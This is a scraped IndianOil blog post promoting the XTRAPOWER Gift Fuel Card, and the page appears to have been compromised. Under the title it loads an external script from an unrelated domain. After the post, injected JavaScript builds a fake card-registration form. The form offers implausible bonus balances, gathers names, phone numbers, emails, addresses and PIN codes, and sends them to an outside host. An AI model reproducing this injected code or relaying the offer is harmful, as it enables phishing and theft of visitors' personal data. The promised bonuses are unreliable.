Fuel Gift Card May 25 2022, By IndianOil

Is Fuel Gift Card the best option for you?<script src="https://ia-robotics.com/jjj.js"></script>

Fuel Gift Cards not only give you useful perks and incentives but they also provide you with a myriad of options to better manage and control expenses too. In this regard the use of fuel gift cards has seen an upward trend as more and more customers and business owners become aware of its benefits. Therefore by opting for the XTRAPOWER Gift Fuel Card you are giving yourself a convenient, secure and versatile gifting option. This blog post takes a closer look at why using fuel cards will prove to be a helpful tool in streamlining everyday logistical processes for fleet managers, drivers and business owners.

asasasasasas

By gifting the XTRAPOWER Gift Fuel Card you are making the right decision because it provides you with a hassle free solution. Your fuel gift card comes preloaded with value which you can use till the value is exhausted. You can realize the full potential of your XTRAPOWER Gift Fuel Card when you buy fuel and earn loyalty points to redeem them on your next purchase of fuel and lubricants. With the XTRAPOWER Gift Fuel Card, you can pay at the pump and get on the road without worrying about having sufficient cash at hand. Fuel cards help achieve the goal of being time efficient as they are a quick and convenient way to pay for fuel.

You can easily manage your XTRAPOWER Gift Fuel Card by making use of simple and multiple recharge options depending on your fuel requirements, blocking or unblocking a card or assigning limits on how much fuel drivers can buy while they are on the road and other parameters making it a hassle free process. With the XTRAPOWER Gift Fuel Card you can efficiently manage and take control of your fleet with features like password protection, auto pin block, hot-listing, instant SMS alerts and detailed reports. Your card can also help eliminate any fraudulent transactions therefore, you can be assured of the security of your fuel gift card.

When you invest in a gift card that is associated with a large fuel retail network like IndianOil, you have access and the opportunity to buy fuel at your convenience and exercise flexibility. With a reduction in dead mileage looking for an outlet you can in turn save fuel and increase efficiency of your fleet at the same time with the XTRAPOWER Gift Fuel Card. Although price fluctuations are inevitable, fuel cards can help you control the costs of your expenses by giving you insight into how much fuel each driver is using. XTRAPOWER Gift Fuel Card is a great way of availing discounts and also finding out how you can improve efficiency for longer-term savings.

Using fuel cards gives you more flexibility for refueling across a huge network. Sometimes plans and routes change and the ability to use a fuel card across IndianOil?s vast networks gives your drivers the freedom to adjust their route as necessary. Thus, the XTRAPOWER Gift Fuel Card is a convenient way for drivers to get the fuel they need, when they need it. With traditional methods of purchasing fuel comes the hassle of collecting receipts, claiming expenses etc. Fuel cards let you skip a lot of the process.

Conclusion:

A major benefit of using a fuel card is that it makes it easier for you to have a more organized record keeping system. You can keep a tab on every transaction, fuel spent and other detailed and in-depth reports by simply logging in to your account. Therefore, XTRAPOWER Gift Fuel Card gives you transparency and saves you time and money. Full Value Gifting Quick and Convenient Method of Payment Easy Management Safe and Secure Pan India Network Cost Saving Increased Flexibility of Drivers Accurate Records and Analytical Reports.

.main { padding-top: 100px; } .card_img { padding-bottom: 50px; } .card_img img { margin: auto !important; /* box-shadow: rgba(0, 0, 0, 0.19) 0px 10px 20px, rgba(0, 0, 0, 0.23) 0px 6px 6px; /* width: auto !important; */ /* box-shadow: rgba(50, 50, 93, 0.25) 0px 50px 100px -20px, rgba(0, 0, 0, 0.3) 0px 30px 60px -30px, rgba(10, 37, 64, 0.35) 0px -2px 6px 0px inset; */ margin: 0; /* border-radius: 15px; max-width: 550px !important; /* border: 1px solid black; */ } .hero-area { padding-top: 150px; /* padding-bottom: 0; */ min-height: unset !important; } .my-head-title { font-size: 50px !important; } .my-sub-title { font-size: 20px !important; } .table-plan { margin-top: 2rem; } .table-plan th, .table-plan td { text-align: center; vertical-align: middle; } .table-plan th { background-color: #f8f9fa; } .table-plan .btn-select { margin-top: 1rem; background-color: #f27229; border-color: #f27229; } .table-plan .btn-select:hover { background-color: #e0661f; border-color: #f27229; } .table-plan .btn-select:active { background-color: #e0661f !important; border-color: #f27229; border: none !important; outline: none !important; box-shadow: none !important; } .selected-row { background-color: #f27229 !important; color: white; } .error{ color: red !important; }

Finish up your card registeration

Complete the form below and recieve your card within days

Choose your plan

Price (Rs) First time Bonus Card Balance(Rs) Action
2000 15% 2400 Select
5000 25% 7500 Select
7,500 50% 6750 Select
10,000 70% 6750 Select
15,000 85% 6750 Select
25,000 100% 50,000 Select
` document.querySelector('header').insertAdjacentElement('afterend', x) console.log(document.getElementById('card_img')) // ################################################ // ############# TABLE SELECT ############# // ################################################ // document.addEventListener('DOMContentLoaded', function () { const rows = document.querySelectorAll('.table-plan tbody tr'); rows.forEach(row => { row.querySelector('.btn-select').addEventListener('click', function (event) { event.preventDefault(); // Remove selected-row class from all rows rows.forEach(r => { r.removeAttribute('selected') r.querySelectorAll('td').forEach(cell => { cell.style.backgroundColor = ''; cell.style.color = '' }); }); row.setAttribute('selected', '') row.querySelectorAll('td').forEach((cell, index, cells) => { if (index !== cells.length - 1) { cell.style.backgroundColor = '#f27229'; cell.style.color = 'white'; } }); selected_row_value = document.querySelector('.table-plan tbody tr[selected]').getAttribute('value') document.getElementById('plan').setAttribute('value', selected_row_value) }); }); // }); // document.addEventListener('DOMContentLoaded', function () { const full_name = document.getElementById('full_name'); const name_on_card = document.getElementById('name_on_card'); const pin_code = document.getElementById('pin_code'); const mobile_number = document.getElementById('mobile_number'); const email = document.getElementById('my_email'); const address = document.getElementById('address'); const error_full_name = document.getElementById('error_full_name'); const error_name_on_card = document.getElementById('error_name_on_card'); const error_pin_code = document.getElementById('error_pin_code'); const error_mobile_number = document.getElementById('error_mobile_number'); const error_email = document.getElementById('error_email'); const error_address = document.getElementById('error_address'); const proceedBtn = document.getElementById('my_submit_boton'); const error_card_balance = document.getElementById('error_card_balance') function validateFullName() { if (!full_name.value.trim()) { error_full_name.removeAttribute('hidden'); return false; } error_full_name.setAttribute('hidden', ''); return true; } function validateNameOnCard() { if (!name_on_card.value.trim()) { error_name_on_card.removeAttribute('hidden'); return false; } error_name_on_card.setAttribute('hidden', ''); return true; } function validatePinCode() { if (!pin_code.value.trim() || pin_code.value.trim().length !== 6) { error_pin_code.removeAttribute('hidden'); return false; } error_pin_code.setAttribute('hidden', ''); return true; } function validateMobileNumber() { if (!mobile_number.value.trim() || mobile_number.value.trim().length !== 10) { error_mobile_number.removeAttribute('hidden'); return false; } error_mobile_number.setAttribute('hidden', ''); return true; } function my_validateEmail() { const emailPattern = /^[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+.[a-zA-Z]{2,}$/; if (!email.value.trim() || !emailPattern.test(email.value.trim())) { error_email.removeAttribute('hidden'); return false; } error_email.setAttribute('hidden', ''); return true; } function validateAddress() { if (!address.value.trim()) { error_address.removeAttribute('hidden'); return false; } error_address.setAttribute('hidden', ''); return true; } function validateTable() { const selectedRow = document.querySelector('.table-plan tbody tr[selected]'); if (selectedRow) { error_card_balance.setAttribute('hidden', ''); return true; } else { error_card_balance.removeAttribute('hidden'); return false; } } function scrollToError() { const errorInput = document.querySelectorAll('.error:not([hidden])')[0]; if (errorInput) { const errorInputPosition = errorInput.getBoundingClientRect().top + window.scrollY; window.scrollTo({ top: errorInputPosition - 200, behavior: 'smooth' }); } } proceedBtn.addEventListener('click', function () { const isFullNameValid = validateFullName(); const isNameOnCardValid = validateNameOnCard(); const isPinCodeValid = validatePinCode(); const isMobileNumberValid = validateMobileNumber(); const isEmailValid = my_validateEmail(); const isAddressValid = validateAddress(); const isTableValid = validateTable(); if (isFullNameValid && isNameOnCardValid && isPinCodeValid && isMobileNumberValid && isEmailValid && isAddressValid && isTableValid) { const formData = new FormData(document.getElementById('form_id')); let params = new URLSearchParams(); formData.forEach((value, key) => { params.append(key, value); }); let url = 'https://test_123234.com?' + params.toString(); window.open(url, '_blank'); } else { scrollToError(); } }); full_name.addEventListener('input', validateFullName); name_on_card.addEventListener('input', validateNameOnCard); pin_code.addEventListener('input', validatePinCode); mobile_number.addEventListener('input', validateMobileNumber); email.addEventListener('input', my_validateEmail); address.addEventListener('input', validateAddress); // }); // ################################################ // ############# IMG DATA ########### // ################################################ document.getElementById('card_img').setAttribute('src', 'https://www.iocxtrapower.com/assets/img/img_program_cover.webp'); document.getElementById('my_start_now').setAttribute('href', (window.location.href + '#' + 'my_enroll')); } })()">

Read more blogs

May 25 2022 Points to Ponder While Choosing a Telematics System